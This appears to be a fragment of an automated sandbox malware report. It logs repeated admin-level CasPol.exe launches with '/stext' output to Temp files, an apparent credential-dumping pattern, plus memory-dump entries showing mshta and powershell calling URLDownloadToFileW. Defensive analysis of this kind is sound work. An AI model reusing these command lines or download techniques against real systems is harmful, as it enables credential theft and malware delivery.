                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                  Start time:00:14:40
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                  Start time:00:14:41
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                  Start time:00:14:41
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                  Start time:00:14:41
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                  Start time:00:14:42
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                  Start time:00:14:42
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                  Start time:00:14:48
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
                                                                                                                                                                                                                  Imagebase:0xbf0000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                  Start time:00:14:48
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                  Start time:00:14:48
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                  Start time:00:14:49
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                  Start time:00:14:49
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                  Start time:00:14:50
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                  Start time:00:14:51
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                  Start time:00:14:52
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.407151396.0000000003440000.00000010.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3440000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 20432c6e0f33fcc05d61804af090da680bc56eb8a475a7034f9e421faa5691b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.407151396.0000000003440000.00000010.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3440000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 20432c6e0f33fcc05d61804af090da680bc56eb8a475a7034f9e421faa5691b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.407151396.0000000003440000.00000010.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3440000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 20432c6e0f33fcc05d61804af090da680bc56eb8a475a7034f9e421faa5691b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.407151396.0000000003440000.00000010.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3440000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 20432c6e0f33fcc05d61804af090da680bc56eb8a475a7034f9e421faa5691b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.407151396.0000000003440000.00000010.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_3440000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 20432c6e0f33fcc05d61804af090da680bc56eb8a475a7034f9e421faa5691b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:5.1%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:50%
                                                                                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                    execution_graph 2236 7fe899b4b18 2237 7fe899b5a40 URLDownloadToFileW 2236->2237 2239 7fe899b5b10 2237->2239 2232 7fe899b59f1 2233 7fe899b5a01 URLDownloadToFileW 2232->2233 2235 7fe899b5b10 2233->2235

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.432627048.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                                                                                    • Opcode ID: a25730941805b0ae89800798a5218a6604e737f8f393bc1754af90d388327776
                                                                                                                                                                                                                    • Instruction ID: 1cc0857a21871cbc2c717be3af460354a2fce21c1a4c807d65175ddd13cd67bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a25730941805b0ae89800798a5218a6604e737f8f393bc1754af90d388327776
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49319131918A5C8FDB58DF5C98857A9B7E1FB59311F00822ED04ED3661CB74B8568B81

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.432627048.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                                                                                    • Opcode ID: 562912f0557a30267ac21660296ae275c1499a72648ddcd4ad76794a0089ef52
                                                                                                                                                                                                                    • Instruction ID: 04c80e2a2317e6e7ed074b3c6151d1c1d3830f8d62a4d0a407a56200be5902a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 562912f0557a30267ac21660296ae275c1499a72648ddcd4ad76794a0089ef52
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE41133081CB989FDB1ADB589C447B9BBF4FB56321F04826FD08DD3162CB286846C782

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 26 7fe89a82649-7fe89a826f9 27 7fe89a82bdd-7fe89a82c96 26->27 28 7fe89a826ff-7fe89a82709 26->28 29 7fe89a8270b-7fe89a82718 28->29 30 7fe89a82722-7fe89a82729 28->30 29->30 32 7fe89a8271a-7fe89a82720 29->32 33 7fe89a8272b-7fe89a8273e 30->33 34 7fe89a82740 30->34 32->30 35 7fe89a82742-7fe89a82744 33->35 34->35 38 7fe89a82b58-7fe89a82b62 35->38 39 7fe89a8274a-7fe89a82756 35->39 40 7fe89a82b75-7fe89a82b85 38->40 41 7fe89a82b64-7fe89a82b74 38->41 39->27 42 7fe89a8275c-7fe89a82766 39->42 44 7fe89a82b87-7fe89a82b8b 40->44 45 7fe89a82b92-7fe89a82bdc 40->45 46 7fe89a82768-7fe89a82775 42->46 47 7fe89a82782-7fe89a82792 42->47 44->45 46->47 48 7fe89a82777-7fe89a82780 46->48 47->38 53 7fe89a82798-7fe89a827cc 47->53 48->47 53->38 58 7fe89a827d2-7fe89a827de 53->58 58->27 59 7fe89a827e4-7fe89a827ee 58->59 60 7fe89a82807-7fe89a8280c 59->60 61 7fe89a827f0-7fe89a827fd 59->61 60->38 62 7fe89a82812-7fe89a82817 60->62 61->60 63 7fe89a827ff-7fe89a82805 61->63 62->38 64 7fe89a8281d-7fe89a82822 62->64 63->60 64->38 65 7fe89a82828-7fe89a82837 64->65 67 7fe89a82847 65->67 68 7fe89a82839-7fe89a82843 65->68 71 7fe89a8284c-7fe89a82859 67->71 69 7fe89a82863-7fe89a828ee 68->69 70 7fe89a82845 68->70 78 7fe89a828f0-7fe89a828fb 69->78 79 7fe89a82902-7fe89a82924 69->79 70->71 71->69 72 7fe89a8285b-7fe89a82861 71->72 72->69 78->79 80 7fe89a82926-7fe89a82930 79->80 81 7fe89a82934 79->81 82 7fe89a82950-7fe89a829de 80->82 83 7fe89a82932 80->83 84 7fe89a82939-7fe89a82946 81->84 91 7fe89a829e0-7fe89a829eb 82->91 92 7fe89a829f2-7fe89a82a10 82->92 83->84 84->82 86 7fe89a82948-7fe89a8294e 84->86 86->82 91->92 93 7fe89a82a20 92->93 94 7fe89a82a12-7fe89a82a1c 92->94 97 7fe89a82a25-7fe89a82a33 93->97 95 7fe89a82a3d-7fe89a82acd 94->95 96 7fe89a82a1e 94->96 104 7fe89a82acf-7fe89a82ada 95->104 105 7fe89a82ae1-7fe89a82b3a 95->105 96->97 97->95 98 7fe89a82a35-7fe89a82a3b 97->98 98->95 104->105 108 7fe89a82b42-7fe89a82b57 105->108
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.432686133.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1c23bc1f5b02372c0f0c3a3c88a8e7af368db85020a323d01d76229cd28037f8
                                                                                                                                                                                                                    • Instruction ID: 9e2c28deaf8b183c02d26cb74238e0e4ce2bf2fee95cc1dd572cef23932768d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c23bc1f5b02372c0f0c3a3c88a8e7af368db85020a323d01d76229cd28037f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D22233090CB894FE799DB2C84542797BE2FF8A345F2401EAD48ED72A3DA24AC56C741

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 109 7fe89a80f3f-7fe89a80f96 110 7fe89a81098-7fe89a810dc 109->110 111 7fe89a80f9c-7fe89a80fa6 109->111 119 7fe89a810ed-7fe89a81124 110->119 120 7fe89a810de-7fe89a810ea 110->120 112 7fe89a80fa8-7fe89a80fb5 111->112 113 7fe89a80fbf-7fe89a80fee 111->113 112->113 114 7fe89a80fb7-7fe89a80fbd 112->114 113->110 124 7fe89a80ff4-7fe89a80ffe 113->124 114->113 122 7fe89a8112a-7fe89a8119e 119->122 123 7fe89a811c1-7fe89a811cb 119->123 120->119 142 7fe89a811a6-7fe89a811be 122->142 125 7fe89a811d8-7fe89a811e8 123->125 126 7fe89a811cd-7fe89a811d7 123->126 127 7fe89a81017-7fe89a81077 124->127 128 7fe89a81000-7fe89a8100d 124->128 129 7fe89a811ea-7fe89a811ee 125->129 130 7fe89a811f5-7fe89a8121a 125->130 139 7fe89a81079-7fe89a81084 127->139 140 7fe89a8108b-7fe89a81097 127->140 128->127 132 7fe89a8100f-7fe89a81015 128->132 129->130 132->127 139->140 142->123
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.432686133.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3d8052e1c0ade4749ea2a6af0dcb2775e225fbde68c7258c239044c204de481b
                                                                                                                                                                                                                    • Instruction ID: f9aad18b80fa306773809095a1a439dde5a2fa10e46c1c62e82f9d00b3f80f70
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d8052e1c0ade4749ea2a6af0dcb2775e225fbde68c7258c239044c204de481b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8A12420A1DBC90FE357973C58642617FE1EF5B254B1A01EBC48DDB2B3D9189C5AC362
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000010.00000003.458567914.00000000034C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_3_34c0000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 6f922dcc98d91d4811734c1656a5f86df74e1f4d4c2b678e46ef0c59869644ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000010.00000003.458567914.00000000034C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_3_34c0000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 6f922dcc98d91d4811734c1656a5f86df74e1f4d4c2b678e46ef0c59869644ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000010.00000003.458567914.00000000034C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_3_34c0000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 6f922dcc98d91d4811734c1656a5f86df74e1f4d4c2b678e46ef0c59869644ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000010.00000003.458567914.00000000034C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_3_34c0000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
